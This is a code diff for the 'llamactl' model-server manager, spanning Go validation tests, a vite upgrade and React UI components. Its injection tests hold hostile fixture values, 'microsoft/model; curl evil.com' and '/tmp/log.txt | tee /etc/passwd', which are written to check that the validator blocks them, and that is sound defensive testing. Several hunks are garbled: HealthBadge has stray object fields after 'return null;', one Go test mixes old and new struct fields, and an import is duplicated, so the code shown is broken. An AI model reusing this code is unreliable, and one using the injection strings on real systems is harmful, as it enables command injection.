-					if err := validateStringForInjection(field.Index(j).String()); err != nil {
+					if err := ValidateStringForInjection(field.Index(j).String()); err != nil {
 						return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
 					}
 				}
 			}
 		case reflect.Struct:
-			if err := validateStructStrings(field.Interface(), fieldName); err != nil {
+			if err := ValidateStructStrings(field.Interface(), fieldName); err != nil {
 				return err
 			}
 		}
--- a/pkg/validation/validation_test.go
+++ b/pkg/validation/validation_test.go
@@ -2,9 +2,6 @@ package validation_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
 	"llamactl/pkg/validation"
 	"strings"
 	"testing"
@@ -58,13 +55,11 @@ func TestValidateInstanceName(t *testing.T) {
 }
 func TestValidateInstanceOptions_NilOptions(t *testing.T) {
-	err := validation.ValidateInstanceOptions(nil)
+	var opts backends.Options
 	err := opts.ValidateInstanceOptions()
 	if err == nil {
 		t.Error("Expected error for nil options")
 	}
 	if !strings.Contains(err.Error(), "options cannot be nil") {
 		t.Errorf("Expected 'options cannot be nil' error, got: %v", err)
 	}
 }
 func TestValidateInstanceOptions_PortValidation(t *testing.T) {
@@ -83,14 +78,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			options := &instance.CreateInstanceOptions{
+			options := backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Port: tt.port,
 				},
 			}
-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
 			}
@@ -137,14 +132,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Model field (string field)
-			options := &instance.CreateInstanceOptions{
+			options := backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: tt.value,
 				},
 			}
-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
 			}
@@ -175,14 +170,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Lora field (array field)
-			options := &instance.CreateInstanceOptions{
+			options := backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Lora: tt.array,
 				},
 			}
-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
 			}
@@ -194,14 +189,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 	// Test that injection in any field is caught
 	tests := []struct {
 		name    string
-		options *instance.CreateInstanceOptions
+		options backends.Options
 		wantErr bool
 	}{
 		{
 			name: "injection in model field",
-			options: &instance.CreateInstanceOptions{
+			options: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:  "safe.gguf",
 					HFRepo: "microsoft/model; curl evil.com",
 				},
@@ -210,9 +205,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		},
 		{
 			name: "injection in log file",
-			options: &instance.CreateInstanceOptions{
+			options: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:   "safe.gguf",
 					LogFile: "/tmp/log.txt | tee /etc/passwd",
 				},
@@ -221,9 +216,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		},
 		{
 			name: "all safe fields",
-			options: &instance.CreateInstanceOptions{
+			options: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:   "/path/to/model.gguf",
 					HFRepo:  "microsoft/DialoGPT-medium",
 					LogFile: "/tmp/llama.log",
@@ -237,7 +232,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			err := validation.ValidateInstanceOptions(tt.options)
+			err := tt.options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
 			}
@@ -247,12 +242,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 	// Test that non-string fields don't interfere with validation
-	options := &instance.CreateInstanceOptions{
+	options := backends.Options{
-		AutoRestart:  testutil.BoolPtr(true),
+		BackendType: backends.BackendTypeLlamaCpp,
-		MaxRestarts:  testutil.IntPtr(5),
+		LlamaServerOptions: &backends.LlamaServerOptions{
 		RestartDelay: testutil.IntPtr(10),
 		BackendType:  backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Port:        8080,
 			GPULayers:   32,
 			CtxSize:     4096,
@@ -264,7 +256,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 		},
 	}
-	err := validation.ValidateInstanceOptions(options)
+	err := options.ValidateInstanceOptions()
 	if err != nil {
 		t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
 	}
--- a/webui/package-lock.json
+++ b/webui/package-lock.json
@@ -43,7 +43,7 @@
        "tw-animate-css": "^1.3.5",
        "typescript": "^5.8.3",
        "typescript-eslint": "^8.38.0",
-        "vite": "^7.1.5",
+        "vite": "^7.1.11",
        "vitest": "^3.2.4"
      }
    },
@@ -7424,9 +7424,9 @@
      }
    },
    "node_modules/vite": {
-      "version": "7.1.5",
+      "version": "7.1.11",
-      "resolved": "https://registry.npmjs.org/vite/-/vite-7.1.5.tgz",
+      "resolved": "https://registry.npmjs.org/vite/-/vite-7.1.11.tgz",
-      "integrity": "sha512-4cKBO9wR75r0BeIWWWId9XK9Lj6La5X846Zw9dFfzMRw38IlTk2iCcUt6hsyiDRcPidc55ZParFYDXi0nXOeLQ==",
+      "integrity": "sha512-uzcxnSDVjAopEUjljkWh8EIrg6tlzrjFUfMcR1EVsRDGwf/ccef0qQPRyOrROwhrTDaApueq+ja+KLPlzR/zdg==",
      "license": "MIT",
      "dependencies": {
        "esbuild": "^0.25.0",
--- a/webui/package.json
+++ b/webui/package.json
@@ -52,7 +52,7 @@
    "tw-animate-css": "^1.3.5",
    "typescript": "^5.8.3",
    "typescript-eslint": "^8.38.0",
-    "vite": "^7.1.5",
+    "vite": "^7.1.11",
    "vitest": "^3.2.4"
  }
 }
--- a/webui/src/tests/App.test.tsx
+++ b/webui/src/tests/App.test.tsx
@@ -12,12 +12,14 @@ import { AuthProvider } from '@/contexts/AuthContext'
 vi.mock('@/lib/api', () => ({
  instancesApi: {
    list: vi.fn(),
    get: vi.fn(),
    create: vi.fn(),
    update: vi.fn(),
    start: vi.fn(),
    stop: vi.fn(),
    restart: vi.fn(),
    delete: vi.fn(),
    getHealth: vi.fn(),
  },
  serverApi: {
    getHelp: vi.fn(),
@@ -30,9 +32,21 @@ vi.mock('@/lib/api', () => ({
 vi.mock('@/lib/healthService', () => ({
  healthService: {
    subscribe: vi.fn(() => () => {}),
-    checkHealth: vi.fn(),
+    refreshHealth: vi.fn(() => Promise.resolve()),
    checkHealthAfterOperation: vi.fn(),
    performHealthCheck: vi.fn(() => Promise.resolve({
      state: 'ready',
      instanceStatus: 'running',
      lastChecked: new Date(),
      source: 'http'
    })),
  },
-  checkHealth: vi.fn(),
+  checkHealth: vi.fn(() => Promise.resolve({
    state: 'ready',
    instanceStatus: 'running',
    lastChecked: new Date(),
    source: 'http'
  })),
 }))
 function renderApp() {
--- a/webui/src/components/BackendBadge.tsx
+++ b/webui/src/components/BackendBadge.tsx
@@ -1,13 +1,14 @@
 import React from "react";
 import { Badge } from "@/components/ui/badge";
 import { BackendType, type BackendTypeValue } from "@/types/instance";
-import { Server } from "lucide-react";
+import { Server, Package } from "lucide-react";
 interface BackendBadgeProps {
  backend?: BackendTypeValue;
  docker?: boolean;
 }
-const BackendBadge: React.FC<BackendBadgeProps> = ({ backend }) => {
+const BackendBadge: React.FC<BackendBadgeProps> = ({ backend, docker }) => {
  if (!backend) {
    return null;
  }
@@ -39,13 +40,25 @@ const BackendBadge: React.FC<BackendBadgeProps> = ({ backend }) => {
  };
  return (
-    <Badge
+    <div className="flex items-center gap-1">
-      variant="outline"
+      <Badge
-      className={`flex items-center gap-1.5 ${getColorClasses()}`}
+        variant="outline"
-    >
+        className={`flex items-center gap-1.5 ${getColorClasses()}`}
-      <Server className="h-3 w-3" />
+      >
-      <span className="text-xs">{getText()}</span>
+        <Server className="h-3 w-3" />
-    </Badge>
+        <span className="text-xs">{getText()}</span>
      </Badge>
      {docker && (
        <Badge
          variant="outline"
          className="flex items-center gap-1.5 bg-orange-100 text-orange-800 border-orange-200 dark:bg-orange-900 dark:text-orange-200 dark:border-orange-800"
          title="Docker enabled"
        >
          <Package className="h-3 w-3" />
          <span className="text-[10px] uppercase tracking-wide">Docker</span>
        </Badge>
      )}
    </div>
  );
 };
--- a/webui/src/components/HealthBadge.tsx
+++ b/webui/src/components/HealthBadge.tsx
@@ -2,7 +2,7 @@
 import React from "react";
 import { Badge } from "@/components/ui/badge";
 import type { HealthStatus } from "@/types/instance";
-import { CheckCircle, Loader2, XCircle } from "lucide-react";
+import { CheckCircle, Loader2, XCircle, Clock } from "lucide-react";
 interface HealthBadgeProps {
  health?: HealthStatus;
@@ -10,37 +10,33 @@ interface HealthBadgeProps {
 const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
  if (!health) {
-    health = {
+    return null;
      status: "unknown", // Default to unknown if not provided
      lastChecked: new Date(), // Default to current date
      message: undefined, // No message by default
    };
  }
  const getIcon = () => {
-    switch (health.status) {
+    switch (health.state) {
-      case "ok":
+      case "ready":
        return <CheckCircle className="h-3 w-3" />;
-      case "loading":
+      case "starting":
        return <Loader2 className="h-3 w-3 animate-spin" />;
-      case "error":
+      case "restarting":
        return <XCircle className="h-3 w-3" />;
      case "unknown":
        return <Loader2 className="h-3 w-3 animate-spin" />;
      case "stopped":
        return <Clock className="h-3 w-3" />;
      case "failed":
        return <XCircle className="h-3 w-3" />;
    }
  };
  const getVariant = () => {
-    switch (health.status) {
+    switch (health.state) {
-      case "ok":
+      case "ready":
        return "default";
-      case "loading":
+      case "starting":
        return "outline";
-      case "error":
+      case "restarting":
-        return "destructive";
+        return "outline";
-      case "unknown":
+      case "stopped":
        return "secondary";
      case "failed":
        return "destructive";
@@ -48,15 +44,15 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
  };
  const getText = () => {
-    switch (health.status) {
+    switch (health.state) {
-      case "ok":
+      case "ready":
        return "Ready";
-      case "loading":
+      case "starting":
-        return "Loading";
+        return "Starting";
-      case "error":
+      case "restarting":
-        return "Error";
+        return "Restarting";
-      case "unknown":
+      case "stopped":
-        return "Unknown";
+        return "Stopped";
      case "failed":
        return "Failed";
    }
@@ -66,10 +62,11 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
    <Badge
      variant={getVariant()}
      className={`flex items-center gap-1.5 ${
-        health.status === "ok"
+        health.state === "ready"
          ? "bg-green-100 text-green-800 border-green-200 dark:bg-green-900 dark:text-green-200 dark:border-green-800"
          : ""
      }`}
      title={health.error || `Source: ${health.source}`}
    >
      {getIcon()}
      <span className="text-xs">{getText()}</span>
--- a/webui/src/components/InstanceCard.tsx
+++ b/webui/src/components/InstanceCard.tsx
@@ -66,7 +66,7 @@ function InstanceCard({
            {/* Badges row */}
            <div className="flex items-center gap-2 flex-wrap">
-              <BackendBadge backend={instance.options?.backend_type} />
+              <BackendBadge backend={instance.options?.backend_type} docker={instance.docker_enabled} />
              {running && <HealthBadge health={health} />}
            </div>
          </div>
--- a/webui/src/components/InstanceDialog.tsx
+++ b/webui/src/components/InstanceDialog.tsx
@@ -106,7 +106,7 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
    // Clean up undefined values to avoid sending empty fields
    const cleanOptions: CreateInstanceOptions = {};
    Object.entries(formData).forEach(([key, value]) => {
-      if (key === 'backend_options' && value && typeof value === 'object') {
+      if (key === 'backend_options' && value && typeof value === 'object' && !Array.isArray(value)) {
        // Handle backend_options specially - clean nested object
        const cleanBackendOptions: any = {};
        Object.entries(value).forEach(([backendKey, backendValue]) => {
@@ -118,13 +118,17 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
            cleanBackendOptions[backendKey] = backendValue;
          }
        });
-        
+
        // Only include backend_options if it has content
        if (Object.keys(cleanBackendOptions).length > 0) {
          (cleanOptions as any)[key] = cleanBackendOptions;
        }
-      } else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
+      } else if (value !== undefined && value !== null) {
-        // Handle arrays - don't include empty arrays
+        // Skip empty strings
        if (typeof value === 'string' && value.trim() === "") {
          return;
        }
        // Skip empty arrays
        if (Array.isArray(value) && value.length === 0) {
          return;
        }
--- a/webui/src/components/ZodFormField.tsx
+++ b/webui/src/components/ZodFormField.tsx
@@ -1,144 +0,0 @@
 import React from 'react'
 import { Input } from '@/components/ui/input'
 import { Label } from '@/components/ui/label'
 import { Checkbox } from '@/components/ui/checkbox'
 import { BackendType, type CreateInstanceOptions } from '@/types/instance'
 import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
 /** Every value shape a ZodFormField can hold or report. */
 type ZodFormFieldValue = string | number | boolean | string[] | undefined
 /** Props accepted by ZodFormField. */
 interface ZodFormFieldProps {
   /** Key of the CreateInstanceOptions property this field edits. */
   fieldKey: keyof CreateInstanceOptions
   /** Current value of the field. */
   value: ZodFormFieldValue
   /** Called with the field key and the new value whenever the field is edited. */
   onChange: (key: keyof CreateInstanceOptions, value: ZodFormFieldValue) => void
 }
 /**
  * Renders the form control for a single CreateInstanceOptions field.
  *
  * The control is chosen from the field type reported by getFieldType:
  * a checkbox for booleans, a number input, a comma-separated text input for
  * arrays, and a plain text input otherwise. The `backend_type` field is
  * special-cased as a dropdown. Every edit is reported through `onChange`
  * together with `fieldKey`; an empty input string is reported as `undefined`.
  */
 const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
   // Get configuration for basic fields, or use field name for advanced fields
   const config = basicFieldsConfig[fieldKey as string] || { label: fieldKey }
   // Get type from Zod schema
   const fieldType = getFieldType(fieldKey)
   // Forward every edit to the parent together with this field's key
   const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
     onChange(fieldKey, newValue)
   }
   const renderField = () => {
     // Special handling for backend_type field - render as dropdown
     if (fieldKey === 'backend_type') {
       return (
         <div className="grid gap-2">
           <Label htmlFor={fieldKey}>
             {config.label}
           </Label>
           <select
             id={fieldKey}
             value={typeof value === 'string' ? value : BackendType.LLAMA_CPP}
             onChange={(e) => handleChange(e.target.value || undefined)}
             className="flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background file:border-0 file:bg-transparent file:text-sm file:font-medium placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50"
           >
             <option value={BackendType.LLAMA_CPP}>Llama Server</option>
             <option value={BackendType.MLX_LM}>MLX LM</option>
             <option value={BackendType.VLLM}>vLLM</option>
           </select>
           {config.description && (
             <p className="text-sm text-muted-foreground">{config.description}</p>
           )}
         </div>
       )
     }
     switch (fieldType) {
       case 'boolean':
         // NOTE(review): assumes a Radix-style Checkbox whose onCheckedChange may
         // report 'indeterminate' besides true/false - confirm. Coercing keeps the
         // stored value a strict boolean either way.
         return (
           <div className="flex items-center space-x-2">
             <Checkbox
               id={fieldKey}
               checked={typeof value === 'boolean' ? value : false}
               onCheckedChange={(checked) => handleChange(checked === true)}
             />
             <Label htmlFor={fieldKey} className="text-sm font-normal">
               {config.label}
               {config.description && (
                 <span className="text-muted-foreground ml-1">- {config.description}</span>
               )}
             </Label>
           </div>
         )
       case 'number':
         return (
           <div className="grid gap-2">
             <Label htmlFor={fieldKey}>
               {config.label}
             </Label>
             <Input
               id={fieldKey}
               type="number"
               step="any" // This allows decimal numbers
               value={typeof value === 'string' || typeof value === 'number' ? value : ''}
               onChange={(e) => {
                 const numValue = e.target.value ? parseFloat(e.target.value) : undefined
                 // Only update if the parsed value is valid or the input is empty
                 if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
                   handleChange(numValue)
                 }
               }}
               placeholder={config.placeholder}
             />
             {config.description && (
               <p className="text-sm text-muted-foreground">{config.description}</p>
             )}
           </div>
         )
       case 'array':
         return (
           <div className="grid gap-2">
             <Label htmlFor={fieldKey}>
               {config.label}
             </Label>
             <Input
               id={fieldKey}
               type="text"
               value={Array.isArray(value) ? value.join(', ') : ''}
               onChange={(e) => {
                 // Split on commas, trim each item and drop the empty ones
                 const arrayValue = e.target.value
                   ? e.target.value.split(',').map(s => s.trim()).filter(Boolean)
                   : undefined
                 handleChange(arrayValue)
               }}
               placeholder="item1, item2, item3"
             />
             {config.description && (
               <p className="text-sm text-muted-foreground">{config.description}</p>
             )}
             <p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
           </div>
         )
       case 'text':
       default:
         return (
           <div className="grid gap-2">
             <Label htmlFor={fieldKey}>
               {config.label}
             </Label>
             <Input
               id={fieldKey}
               type="text"
               value={typeof value === 'string' || typeof value === 'number' ? value : ''}
               onChange={(e) => handleChange(e.target.value || undefined)}
               placeholder={config.placeholder}
             />
             {config.description && (
               <p className="text-sm text-muted-foreground">{config.description}</p>
             )}
           </div>
         )
     }
   }
   return <div className="space-y-2">{renderField()}</div>
 }
 export default ZodFormField
--- a/webui/src/components/tests/InstanceCard.test.tsx
+++ b/webui/src/components/tests/InstanceCard.test.tsx
@@ -2,12 +2,16 @@ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
 import { render, screen } from '@testing-library/react'
 import userEvent from '@testing-library/user-event'
 import InstanceCard from '@/components/InstanceCard'
-import type { Instance } from '@/types/instance'
+import { type Instance, BackendType } from '@/types/instance'
 import { BackendType } from '@/types/instance'
 // Mock the health hook since we're not testing health logic here
 vi.mock('@/hooks/useInstanceHealth', () => ({
-  useInstanceHealth: vi.fn(() => ({ status: 'ok', lastChecked: new Date() }))
+  useInstanceHealth: vi.fn(() => ({
    state: 'ready',
    instanceStatus: 'running',
    lastChecked: new Date(),
    source: 'http'
  }))
 }))
 describe('InstanceCard - Instance Actions and State', () => {
--- a/webui/src/components/tests/InstanceList.test.tsx
+++ b/webui/src/components/tests/InstanceList.test.tsx
@@ -12,12 +12,14 @@ import { AuthProvider } from '@/contexts/AuthContext'
 vi.mock('@/lib/api', () => ({
  instancesApi: {
    list: vi.fn(),
    get: vi.fn(),
    create: vi.fn(),
    update: vi.fn(),
    start: vi.fn(),
    stop: vi.fn(),
    restart: vi.fn(),
    delete: vi.fn(),
    getHealth: vi.fn(),
  }
 }))
@@ -25,9 +27,21 @@ vi.mock('@/lib/api', () => ({
 vi.mock('@/lib/healthService', () => ({
  healthService: {
    subscribe: vi.fn(() => () => {}),
-    checkHealth: vi.fn(),
+    refreshHealth: vi.fn(() => Promise.resolve()),
    checkHealthAfterOperation: vi.fn(),
    performHealthCheck: vi.fn(() => Promise.resolve({
      state: 'ready',
      instanceStatus: 'running',
      lastChecked: new Date(),
      source: 'http'
    })),
  },
-  checkHealth: vi.fn(),
+  checkHealth: vi.fn(() => Promise.resolve({
    state: 'ready',
    instanceStatus: 'running',
    lastChecked: new Date(),
    source: 'http'
  })),
 }))
 function renderInstanceList(editInstance = vi.fn()) {
--- a/webui/src/components/form/EnvironmentVariablesInput.tsx
+++ b/webui/src/components/form/EnvironmentVariablesInput.tsx
@@ -0,0 +1,144 @@
 import React, { useState } from 'react'
 import { Input } from '@/components/ui/input'
 import { Label } from '@/components/ui/label'
 import { Button } from '@/components/ui/button'
 import { X, Plus } from 'lucide-react'
 /** Props accepted by the EnvironmentVariablesInput component. */
 interface EnvironmentVariablesInputProps {
  /** Used as the `htmlFor` target of the field label. */
  id: string
  /** Text rendered inside the field label. */
  label: string
  /** Variables as a name -> value map; used to seed the editable rows. */
  value: Record<string, string> | undefined
  /**
   * Called after every edit with the rows whose name and value are both
   * non-blank (trimmed), or with `undefined` when no such row remains.
   */
  onChange: (value: Record<string, string> | undefined) => void
  /** Optional help text rendered below the rows. */
  description?: string
  /** Disables every input and button when true (the component defaults it to false). */
  disabled?: boolean
  /** Extra class names appended to the root element's classes. */
  className?: string
 }
 /** One editable row: an environment variable name and its value, both as typed by the user. */
 interface EnvVar {
  key: string
  value: string
 }
 /**
  * Editable list of environment variable name/value rows.
  *
  * The rows live in local state that is seeded once from `value`; later changes
  * to the `value` prop are not mirrored back into the rows. After every edit the
  * parent receives, through `onChange`, an object built from the rows whose name
  * and value are both non-blank (trimmed), or `undefined` when there are none.
  * At least one (possibly blank) row is always shown.
  */
 const EnvironmentVariablesInput: React.FC<EnvironmentVariablesInputProps> = ({
  id,
  label,
  value,
  onChange,
  description,
  disabled = false,
  className
 }) => {
  // Seed the rows from the incoming object; fall back to a single blank row
  const [envVars, setEnvVars] = useState<EnvVar[]>(() => {
    const initialRows = value
      ? Object.entries(value).map(([key, val]) => ({ key, value: val }))
      : []
    return initialRows.length > 0 ? initialRows : [{ key: '', value: '' }]
  })
  // Update parent component when env vars change
  const updateParent = (newEnvVars: EnvVar[]) => {
    // Filter out empty entries
    const validVars = newEnvVars.filter(env => env.key.trim() !== '' && env.value.trim() !== '')
    if (validVars.length === 0) {
      onChange(undefined)
    } else {
      const envObject = validVars.reduce((acc, env) => {
        acc[env.key.trim()] = env.value.trim()
        return acc
      }, {} as Record<string, string>)
      onChange(envObject)
    }
  }
  // Replace one row with a patched copy. The row object is never mutated in
  // place, because the previous state array still references it.
  const updateRow = (index: number, patch: Partial<EnvVar>) => {
    const newEnvVars = envVars.map((env, i) => (i === index ? { ...env, ...patch } : env))
    setEnvVars(newEnvVars)
    updateParent(newEnvVars)
  }
  const handleKeyChange = (index: number, newKey: string) => {
    updateRow(index, { key: newKey })
  }
  const handleValueChange = (index: number, newValue: string) => {
    updateRow(index, { value: newValue })
  }
  // Appending a blank row does not notify the parent: blank rows are filtered out anyway
  const addEnvVar = () => {
    setEnvVars([...envVars, { key: '', value: '' }])
  }
  const removeEnvVar = (index: number) => {
    const remaining = envVars.filter((_, i) => i !== index)
    // Removing the last row resets it to a blank one instead of leaving nothing to edit
    const newEnvVars = remaining.length > 0 ? remaining : [{ key: '', value: '' }]
    setEnvVars(newEnvVars)
    updateParent(newEnvVars)
  }
  return (
    <div className={`grid gap-2 ${className || ''}`}>
      <Label htmlFor={id}>
        {label}
      </Label>
      <div className="space-y-2">
        {envVars.map((envVar, index) => (
          <div key={index} className="flex gap-2 items-center">
            <Input
              // The first name input carries the field id so the label's htmlFor resolves to a control
              id={index === 0 ? id : undefined}
              placeholder="Variable name"
              value={envVar.key}
              onChange={(e) => handleKeyChange(index, e.target.value)}
              disabled={disabled}
              className="flex-1"
            />
            <Input
              placeholder="Variable value"
              value={envVar.value}
              onChange={(e) => handleValueChange(index, e.target.value)}
              disabled={disabled}
              className="flex-1"
            />
            <Button
              type="button"
              variant="outline"
              size="sm"
              onClick={() => removeEnvVar(index)}
              disabled={disabled}
              className="shrink-0"
            >
              <X className="h-4 w-4" />
            </Button>
          </div>
        ))}
        <Button
          type="button"
          variant="outline"
          size="sm"
          onClick={addEnvVar}
          disabled={disabled}
          className="w-fit"
        >
          <Plus className="h-4 w-4 mr-2" />
          Add Variable
        </Button>
      </div>
      {description && (
        <p className="text-sm text-muted-foreground">{description}</p>
      )}
      <p className="text-xs text-muted-foreground">
        Environment variables that will be passed to the backend process
      </p>
    </div>
  )
 }
 export default EnvironmentVariablesInput
--- a/webui/src/components/instance/BasicInstanceFields.tsx
+++ b/webui/src/components/instance/BasicInstanceFields.tsx
@@ -1,99 +0,0 @@
 import React from 'react'
 import { BackendType, type CreateInstanceOptions } from '@/types/instance'
 import { getBasicFields, basicFieldsConfig } from '@/lib/zodFormUtils'
 import { getFieldType } from '@/schemas/instanceOptions'
 import TextInput from '@/components/form/TextInput'
 import NumberInput from '@/components/form/NumberInput'
 import CheckboxInput from '@/components/form/CheckboxInput'
 import SelectInput from '@/components/form/SelectInput'
 /** Props accepted by the BasicInstanceFields component. */
 interface BasicInstanceFieldsProps {
  /** Current option values; each rendered field reads its value from here by key. */
  formData: CreateInstanceOptions
  /** Called with the field key and the new value whenever a rendered field changes. */
  onChange: (key: keyof CreateInstanceOptions, value: any) => void
 }
 /**
  * Renders the "Basic Configuration" section of the instance form.
  *
  * Each key returned by getBasicFields() becomes one input, except the auto
  * restart keys and `backend_options`, which are left out here. The input kind
  * follows getFieldType(): checkbox for booleans, number input for numbers,
  * text input for anything else. `backend_type` always renders as a select.
  */
 const BasicInstanceFields: React.FC<BasicInstanceFieldsProps> = (props) => {
  const { formData, onChange } = props
  const allBasicKeys = getBasicFields()
  // Keys that are handled separately (auto restart fields and backend_options)
  const excludedKeys = ['auto_restart', 'max_restarts', 'restart_delay', 'backend_options']
  const renderField = (fieldKey: keyof CreateInstanceOptions) => {
    const config = basicFieldsConfig[fieldKey as string] || { label: fieldKey }
    const kind = getFieldType(fieldKey)
    // backend_type is a fixed choice list rather than free-form input
    if (fieldKey === 'backend_type') {
      return (
        <SelectInput
          key={fieldKey}
          id={fieldKey}
          label={config.label}
          value={formData[fieldKey] || BackendType.LLAMA_CPP}
          onChange={(selected) => onChange(fieldKey, selected)}
          options={[
            { value: BackendType.LLAMA_CPP, label: 'Llama Server' },
            { value: BackendType.MLX_LM, label: 'MLX LM' },
            { value: BackendType.VLLM, label: 'vLLM' }
          ]}
          description={config.description}
        />
      )
    }
    if (kind === 'boolean') {
      return (
        <CheckboxInput
          key={fieldKey}
          id={fieldKey}
          label={config.label}
          value={formData[fieldKey] as boolean | undefined}
          onChange={(checked) => onChange(fieldKey, checked)}
          description={config.description}
        />
      )
    }
    if (kind === 'number') {
      return (
        <NumberInput
          key={fieldKey}
          id={fieldKey}
          label={config.label}
          value={formData[fieldKey] as number | undefined}
          onChange={(num) => onChange(fieldKey, num)}
          placeholder={config.placeholder}
          description={config.description}
        />
      )
    }
    // Everything else falls back to a plain text input
    return (
      <TextInput
        key={fieldKey}
        id={fieldKey}
        label={config.label}
        value={formData[fieldKey] as string | number | undefined}
        onChange={(text) => onChange(fieldKey, text)}
        placeholder={config.placeholder}
        description={config.description}
      />
    )
  }
  const visibleKeys = allBasicKeys.filter(
    candidate => !excludedKeys.includes(candidate as string)
  )
  return (
    <div className="space-y-4">
      <h3 className="text-lg font-medium">Basic Configuration</h3>
      {visibleKeys.map(renderField)}
    </div>
  )
 }
 export default BasicInstanceFields
--- a/webui/src/components/instance/InstanceSettingsCard.tsx
+++ b/webui/src/components/instance/InstanceSettingsCard.tsx
@@ -1,4 +1,4 @@
-import React from 'react'
+import React, { useState, useEffect } from 'react'
 import type { CreateInstanceOptions } from '@/types/instance'
 import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
 import { Label } from '@/components/ui/label'
@@ -6,6 +6,9 @@ import { Input } from '@/components/ui/input'
 import AutoRestartConfiguration from '@/components/instance/AutoRestartConfiguration'
 import NumberInput from '@/components/form/NumberInput'
 import CheckboxInput from '@/components/form/CheckboxInput'
 import EnvironmentVariablesInput from '@/components/form/EnvironmentVariablesInput'
 import SelectInput from '@/components/form/SelectInput'
 import { nodesApi, type NodesMap } from '@/lib/api'
 interface InstanceSettingsCardProps {
  instanceName: string
@@ -24,6 +27,46 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
  onNameChange,
  onChange
 }) => {
  const [nodes, setNodes] = useState<NodesMap>({})
  const [loadingNodes, setLoadingNodes] = useState(true)
  useEffect(() => {
    const fetchNodes = async () => {
      try {
        const fetchedNodes = await nodesApi.list()
        setNodes(fetchedNodes)
        // Auto-select first node if none selected
        const nodeNames = Object.keys(fetchedNodes)
        if (nodeNames.length > 0 && (!formData.nodes || formData.nodes.length === 0)) {
          onChange('nodes', [nodeNames[0]])
        }
      } catch (error) {
        console.error('Failed to fetch nodes:', error)
      } finally {
        setLoadingNodes(false)
      }
    }
    void fetchNodes()
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [])
  const nodeOptions = Object.keys(nodes).map(nodeName => ({
    value: nodeName,
    label: nodeName
  }))
  const handleNodeChange = (value: string | undefined) => {
    if (value) {
      onChange('nodes', [value])
    } else {
      onChange('nodes', undefined)
    }
  }
  const selectedNode = formData.nodes && formData.nodes.length > 0 ? formData.nodes[0] : ''
  return (
    <Card>
      <CardHeader>
